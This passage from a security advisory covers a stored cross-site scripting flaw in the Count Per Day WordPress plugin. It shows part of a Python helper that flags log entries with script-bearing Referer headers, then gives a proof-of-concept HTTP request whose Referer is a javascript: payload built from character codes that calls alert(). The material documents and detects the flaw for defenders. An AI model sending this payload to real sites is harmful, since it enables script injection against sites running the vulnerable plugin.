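    scheme. "-" means no Referer was sent and is ignored."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["referer"] == "-":
            continue
        if referer_to_href(m["referer"]) is None:
            hits.append((m["client"], m["referer"]))
    return hits


if __name__ == "__main__":
    print("PoC referer linked as:", referer_to_href(POC_REFERER))
    print("flagged log entries   :", flag_script_referers(LOG_SAMPLE))
```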

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
GET / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
x-forwarded-for: 1.1.1.5
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
Connection: close
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_count_per_day_wordpress_plugin.html
[2] https://wordpress.org/plugins/count-per-day/
[3] https://downloads.wordpress.org/plugin/count-per-day.3.5.5.zip
